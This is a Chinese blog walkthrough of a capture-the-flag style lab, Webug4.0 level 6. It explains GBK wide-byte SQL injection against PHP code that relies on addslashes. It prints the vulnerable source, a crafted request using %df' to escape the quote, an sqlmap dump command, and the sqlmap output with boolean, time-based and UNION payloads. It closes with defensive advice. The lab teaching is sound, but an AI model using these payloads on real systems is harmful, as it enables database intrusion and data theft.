Webug4.0靶场通关笔记06- 第6关SQL宽字节注入

已于 2025-06-25 16:35:53 修改
阅读量805 收藏 8
点赞数 17
CC 4.0 BY-SA版权
分类专栏: webug4.0靶场 文章标签: web安全 webug靶场 SQL注入 宽字节注入
于 2025-04-29 11:34:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/mooyuan/article/details/128119506

目录

一、宽字节注入原理

二、第06关 宽字节注入渗透实战

1、打开靶场

2、源码分析

3、sqlmap注入

 (1)bp抓包保存

 (2)sqlmap注入

 (3)获取flag

三、SQL注入防御

本文通过《Webug4.0靶场通关笔记系列》来进行Webug4.0靶场的渗透实战,本文讲解Webug4.0靶场第6关宽字节注入的渗透实战。

一、宽字节注入原理

宽字节注入是一种特殊类型的SQL注入风险,主要影响使用GBK、BIG5等多字节编码的数据库系统。其核心原理是利用数据库和应用程序对字符编码处理的差异,导致转义字符(如反斜杠\)被"吞并"到宽字符中,从而使原本的转义失效。宽字节注入的原理如下所示。

  1. 编码差异:GBK编码中,某些字符(如%bf%5c)组合会被识别为一个完整字符

  2. 转义失效:攻击者精心构造的%bf'与系统添加的转义符\%5c)组合成合法字符

  3. 注入成功:剩余的单引号未被转义,破坏SQL语句结构

以下是一些宽字节注入中常用的编码及相关说明,以表格形式呈现:

编码类型说明示例
GBK常见的中文字符集,一个汉字由两个字节表示。在宽字节注入中常被利用,因为某些特殊字符组合可绕过单引号转义。%df' 在 GBK 中会被解析为一个宽字节字符,可用于逃逸单引号。
BIG5繁体中文字符集,同样是双字节编码。类似于 GBK,也可能存在宽字节注入风险。%a1%a2 等组合可能被利用。

二、第06关 宽字节注入渗透实战

1、打开靶场

打开webug4靶场的第06关卡宽字节注入,URL地址如下所示。

http://192.168.71.1/webug4/control/sqlinject/width_byte_injection.php?id=1

2、源码分析

分析webug4靶场的第06关卡宽字节注入的源码,这段 PHP 代码实现了一个 SQL 注入攻击演示页面的后端逻辑。首先检查用户会话,未登录则跳转登录页。接着处理 GET 请求的 id 参数,使用 addslashes 过滤单引号,并设置数据库连接字符集为 gbk。随后拼接 SQL 查询语句SELECT * FROM sqlinjection WHERE id = '{$id}'并执行,查询失败时输出错误信息。最后包含模板文件显示查询结果或错误页面。该代码存在明显 SQL 注入风险,未使用预处理语句,攻击者可通过构造特殊 id 参数绕过过滤执行任意 SQL 命令具体如下所示。

<?php

require_once "../../common/common.php";
if (!isset($_SESSION['user'])) {
    header("Location:../login.php");
}

if (isset($_GET["id"])) {
    if (!empty($_GET["id"])) {
        // 过滤引号
        $id = addslashes($_GET['id']);
        $dbConnectWidth->query("SET names 'gbk'");
        $sql = "SELECT * FROM sqlinjection WHERE id = '{$id}'";
        $res = $dbConnectWidth->query($sql) or die("Invalid query: " . mysqli_stmt_error(). $sql);
    }
}
require_once TPMELATE."/manifest-error-injection.html";

对其中关键代码进行注释,如下所示。

// 检查是否存在id参数
if (isset($_GET["id"])) {
    // 检查id参数是否非空
    if (!empty($_GET["id"])) {
        // 使用addslashes对输入进行转义(主要转义单引号等特殊字符)
        $id = addslashes($_GET['id']);
        
        // 设置数据库连接使用GBK编码(危险操作)
        $dbConnectWidth->query("SET names 'gbk'");
        
        // 构造SQL查询语句(直接将用户输入拼接到SQL中)
        $sql = "SELECT * FROM sqlinjection WHERE id = '{$id}'";
        
        // 执行查询,如果失败则输出错误信息和SQL语句(安全隐患)
        $res = $dbConnectWidth->query($sql) or die("Invalid query: " . mysqli_stmt_error(). $sql);
    }
}

 如上所示,SQL语句对GET型参数输入id进行了转移,故而存在普通的字符型SQL注入语句不能渗透成功,但是脚本中使用gbk编码,这也说明存在宽字节注入风险。

  • SQL注入成因组合

    • SET names 'gbk':强制使用GBK宽字符编码,这导致很大概率会有宽字节注入风险。

    • addslashes():使用PHP的转义函数。

    • 直接SQL拼接:'{$id}'直接将用户输入嵌入SQL。

  • 攻击原理

    • 当输入%bf'时:

      • addslashes()会将其转义为%bf\'%bf%5c%27)。

      • 在GBK编码中,%bf%5c会被解析为一个中文字符"縗"。

      • 剩余的单引号%27未被转义,破坏SQL结构。

    • 最终SQL语句变为如下形式:

SELECT * FROM sqlinjection WHERE id = '縗' OR 1=1 -- '

3、sqlmap注入

 (1)bp抓包保存

在渗透的过程中,bp拦截报文并将报文保存为webug06.txt。

修改webug06.txt,在注入点id处尾部加上%df 然后加入注释符%23,并在闭合符号'与注释符中间加上*,如下所示。

GET /webug4/control/sqlinject/width_byte_injection.php?id=1%df'*%23 HTTP/1.1
Host: 192.168.71.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.71.1/webug4/control/we_bug_env.php
Cookie: PHPSESSID=n5mmqjrmgn3fou55o8pbkeb8r7
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

 (2)sqlmap注入

sqlmap -r webug07.txt --current-db --batch -D webug  -T env_list  --dump

如下所示渗透成功。

---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://192.168.71.1:80/webug4/control/sqlinject/width_byte_injection.php?id=1%df' AND 4068=4068#
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://192.168.71.1:80/webug4/control/sqlinject/width_byte_injection.php?id=1%df' AND (SELECT 1835 FROM (SELECT(SLEEP(5)))hRSI)#
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: http://192.168.71.1:80/webug4/control/sqlinject/width_byte_injection.php?id=1%df' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x72625851486b4e4644685346714e41684169784978616d6c4f76785a68646f57667a48634964776c,0x71626a6b71)-- -#
    Vector:  UNION ALL SELECT NULL,[QUERY]-- -
---

 (3)获取flag

如下所示,渗透成功,flag为dfsadfsadfas。

三、SQL注入防御

  • 使用预编译语句:预编译语句会将数据和代码分离,避免恶意代码被当作 SQL 语句的一部分执行,例如使用 PDO 或 mysqli 的预编译功能。
  • 设置正确的字符集:确保 Web 应用、数据库连接和数据库本身的字符集设置一致,避免因字符集问题导致的SQL注入风险。
  • 进行严格的输入验证:不仅要过滤特殊字符,还要对输入的长度、类型等进行严格检查,确保输入符合预期。
Webug4.0靶场通关笔记04-4SQL注入之POST型
mooyuan的网络安全博客
04-29 705
本文通过《Webug4.0靶场通关笔记系列》来进行Webug4.0靶场的渗透实战,本文讲解Webug4.0靶场4POST注入的渗透实战。
webug4.0-宽字节注入
nex1less的博客
08-27 370
0x01 相知识 1. 宽字节是什么? 宽字节字符集:般指Unicode编码的字符集 2. 宽字节注入的作用是什么? 可以绕过转义,也是绕过转义的其中个办法 3. 宽字节注入产生的原因是什么? MySQL连接时错误配置为:set character_set_client=gbk 本例错误配置PHP代码:$dbConnectWidth->query("SET names...
webug4.0 宽字节注入
angry_program的博客
01-06 724
防止sql手工注入 在php+mysql中, 可以通过转义特殊字符来防止污染sql语句(注入), 有两种情况: 魔术引号,magic_quote_gpc 开,不过高版本的PHP将去除这个特性 安全函数, addslashes,mysql_real_escape_string,mysql_escape_string等。 宽字节注入 上有计策下有对策, 当程序员设置数据库编码与p...
webug4.0宽字节注入
Stephen Wolf
01-10 433
宽字节注入原理即是利用编码转换,将服务器端强制添加的本来用于转义的\符号绕过,从而能使攻击者输入的引号起到闭合作用,以至于可以进行SQL注入。 前言 GBK是种多字符编码,个汉字占2个字节,utf-8编码的汉字占3个字节。 addslashes() 函数会对括号里 (')(")(\)(NULL)、的四个字符添加反斜杠并将其返回。 Mysql个特性,在进行GBK编码时会...
SQL注入宽字节注入
秋水的博客
09-01 1351
宽字节注入简介 背景: 尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来个统的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的些cms,仍然使用着自己国家的套编码,比如我国的gbk,作为自己默认的编码类型。也有些cms为了考虑老用户,推出了gbk和utf-8两个版本(例如:dedecms) 编码简介: 我们就以gbk字符编码为...
Webug4.0靶场通关笔记(第三天)--------过滤注入宽字节注入
Yasso的博客
02-21 861
、过滤注入为过滤注入,我以为过滤了空格,百度说过滤了select,单独输select会报错。。。。。。。 那这就跟第四POST注入样,还是搞吧,POST省略了,这个不能省了。。。。。 1.是否报错 加个单引号会报错 2.既然有报错,先判断列数 可以看出有两列,尝试报错注入 union select 1,database()# -------------页面没有回显,所以不能用显错注入 再次尝试 and 1=1# 和 and 1=2# -----但无论对错,都没有回显 所
sqli-labs闯笔记
qq_41738909的博客
01-13 572
3.报错了典型的单引号注入,顺着单引号注入开干!3没报错有三列,4报错了证明有最多有3列。7.看到了username,password这俩就是目标了!id=1在后面加上',"判断是个啥注入方式。5.得到了数据库名字'security' 开始爆库。4. 查看下他有哪些库和数据库版本。6.拿到了库名,开始爆表。1.打开页面观察下。
Sqli-labs全套(1-65)-通关笔记
TyRant的博客
04-10 4751
Basic Challenges 01-Error Based-Single quotes Error Based: 可以通过报错知道闭合方式 > paylod: ?id=1') and ;--+ 源码拼接后: SELECT * FROM users WHERE id=('$id') LIMIT 0,1; SELECT * FROM users WHERE id=('1') and ;-- ') LIMIT 0,1; > err: You have an error in your SQL
DVWA靶场通关(2023)
2301_80548709的博客
02-23 2807
1.这道题是爆破用户名,以及密码,其实就是通过burp软件来爆破抓包成功!接下来爆破修改这两个值,进行爆破,正确导入字典后,开始爆破.因为已经知道了答案,我们可以让爆破的数量少点,找到数量不致的,得到结果2.第二种,主要区别在于我们必须休眠两秒,才能继续.所以让它休眠2000ms就欧克了为了方便,我就将正确答案置于了顶端,可以发现,我们的爆破可以保证全为200的状态码3.第三题,通过查询得到,主要增加了token值,这个东西。
OWASP Security Shepherd CTF键点答案通关指引实战笔记
weixin_56899809的博客
09-17 1398
该文章为安全测试训练平台“OWASP Security Shepherd”的键点指引答案,全部卡答案,键指引点,实战笔记
webug4.0通关笔记
alert['Hello World']
11-03 7336
目录显错注入布尔注入延时注入post注入过滤注入宽字节注入xxe注入csv注入反射型xss存储型xss万能密码登陆任意文件下载DOM型xss过滤xss链接注入任意文件下载mysql配置文件下载文件上传(前端拦截)文件上传(解析漏洞)文件上传(畸形文件)文件上传(截断上传)文件上传(htaccess)越权修改密码支付漏洞邮箱轰炸越权查看adminURL跳转文件包含漏洞命令执行webshell爆破ssrf 环境下载地址: 显错注入 注入点: control/sqlinject/manifest_error.
sql注入
WYJ____的博客
07-26 208
宽字节注入 103.238.227.13:10083/?id=0%df' union select 1,database()%23   103.238.227.13:10083/?id=0%df' union select 1,string from sql5.key where id=1%23    
Webug4.0靶场通关笔记27- 第27文件包含
最新发布
mooyuan的网络安全博客
05-08 926
本文通过《webug4靶场第27 文件包含》来进行文件包含攻击渗透实战。
webug宽字节注入
我只会装360的博客
10-08 286
GBK是种多字符编码,个汉字占2个字节,utf-8编码的汉字占3个字节。 addslashes() 函数会对括号里 ()(")()(NULL)、的四个字符添加反斜杠并将其返回。 Mysql个特性,在进行GBK编码时会将两个字符认为个汉字(前提是第个字符的ASCII大于128才能达到汉字范围)。 如果SQL输入经过了addslashes() 函数处理,我们输入’ 时 会变...
Webug4.0 打靶笔记
m0_60716947的博客
05-11 5326
Webug 的安装 (1)基本信息 WeBug 名称定义为”我们的漏洞”靶场环境 ,基础环境是基于 PHP/mysql 制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBugweb环境都装在了个纯净版的Windows 2003的虚拟机中。在 webug3.0 发布后的四百多天 226安全团队终于在大年初二发布了 webug4.0 版本。 (2)虚拟机的安装 最新超详细VMware虚拟机下载与安装_隐
webug 6宽字节注入
乔木同学
03-15 1016
url:http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1 http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ and 1=1 --+ 不报错 http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ order by 2 --+ 不报错 http://1
Python全栈(五)Web安全攻防之7.MySQL注入读写文件和HTTP头中的SQL注入
CUFEECR的博客
03-10 4643
pikachu是个比较详细的漏洞平台;MySQL读取文件用load_file()函数;写入文件用into outfile。UPDATEXML()函数用于捕捉错误;在user-agent后加入payload进行user-agent注入;通过修改请求头中的referer进行SQL注入测试,可以通过3种方式进行安全测试;在请求头的cookie参数中加入payload‘进行cookie测试;使用Base64加密的注入语句,插入到Cookie对应的位置完成SQL注入漏洞的探测。
webug4.0宽字节注入-6
weixin_34324081的博客
03-17 257
0x00  前言 GBK是种多字符编码,个汉字占2个字节,utf-8编码的汉字占3个字节。 addslashes() 函数会对括号里 (')(")(\)(NULL)、的四个字符添加反斜杠并将其返回。 Mysql个特性,在进行GBK编码时会将两个字符认为个汉字(前提是第个字符的ASCII大于128才能达到汉字范围)。 如果SQL输入经过了addslashes()...
webug 4.0 第六 宽字节注入
ONS_cukuyo的博客
03-08 1286
感谢webug团队直以来的更新维护! webug是什么 WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBugweb环境都装在了个纯净版的Windows 2003的虚拟机中。 Webug官网:http://www.web...
webug4.0靶场通关越权修改密码
03-20
### Web 安全靶场 Webug 4.0 中越权修改密码的解决方案 在 Web 应用程序的安全测试中,“越权访问”是种常见的漏洞,指的是未经授权的用户能够执行超出其权限范围的操作。对于 Webug 4.0 靶场中的越权修改密码场景,以下是详细的分析与解决方法。 #### 背景描述 在 Webug 4.0 的设计中,存在种典型的越权行为模式:攻击者可以通过篡改 HTTP 请求参数(如 `id` 字段),从而冒充其他用户的身份并修改目标用户的密码[^4]。这种漏洞通常源于应用程序未对操作对象的有效性和当前登录用户的权限进行严格验证。 --- #### 技术原理剖析 越权漏洞的核心原因在于服务器端缺乏有效的身份校验机制。具体表现为以下几点: 1. **请求参数未经验证** 当前用户发送的请求可能携带了非法的目标用户 ID 参数(例如 `id=0` 表示管理员)。如果服务端仅依赖前端传递的数据而未进步确认该数据的真实性,则可能导致越权。 2. **缺少细粒度授权控制** 如果应用未能区分不同角色之间的权限边界,就容易让低权限用户获得高权限功能的使用权。 3. **会话管理不当** 即使实现了基于会话的身份认证,但如果会话状态没有绑定到具体的资源访问上下文中,也可能引发类似的越权问题。 --- #### 解决方案实现 针对上述问题,可以从以下几个方面入手来修复此漏洞: ##### 1. 强化后端逻辑校验 每次接收到涉及敏感操作(如更改密码)的请求时,应强制核对该操作是否由合法主体发起。这可通过比较当前已登录账户的信息与待处理记录所属实体的致性完成。例如,在 PHP 或 Python 后端代码中加入如下片段以确保只有本人能重置自己的密码: ```php <?php // 假设 $_SESSION['user_id'] 存储着当前登录者的唯标识符 if ($_POST['target_user_id'] != $_SESSION['user_id']) { die('Access Denied'); // 若两者不符则拒绝继续运行后续脚本 } ?> ``` 或者采用更现代化的语言框架编写类似防护措施: ```python from flask import session, request, abort def change_password(): target_user_id = int(request.form.get('target_user_id')) current_user_id = session.get('user_id') if target_user_id != current_user_id: abort(403) # 返回HTTP Forbidden响应码表示无权访问 # 正常业务流程... ``` 以上两段伪代码均体现了只允许用户对自己账号实施特定变更的原则。 ##### 2. 实施严格的 RBAC (Role-Based Access Control) 引入基于角色的访问控制系统有助于细化各类人员所能触及的功能模块及其内部细节。通过预先定义好的策略组合判定谁可以在何时何地做什么事情,进而减少因疏忽造成的安全隐患。 例如,在 MySQL 数据库表结构层面增加字段用于标记每条记录联的角色类别,并据此调整查询语句条件部分的内容以便筛选出符合条件的结果集之前先过滤掉不符合要求的部分。 ##### 3. 利用 CSRF Token 提升安全性 为了防止恶意站点诱导受害者提交伪造跨站请求(CSRF),建议结合随机生成且难以预测的次性令牌(Token)同嵌入至 HTML 表单之中并与对应 Session 绑定起来共同参与最终判断过程。这样即使黑客截获到了原始 POST 请求也无法轻易复制粘贴成功模拟真实交互动作。 --- #### 总结说明 综上所述,要彻底杜绝此类越权现象的发生除了加强开发阶段的设计考量之外还需要持续注最新威胁情报动态及时修补发现的新缺陷。同时也要提醒广大开发者时刻牢记安全的理念贯穿整个软件开发生命周期始终。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值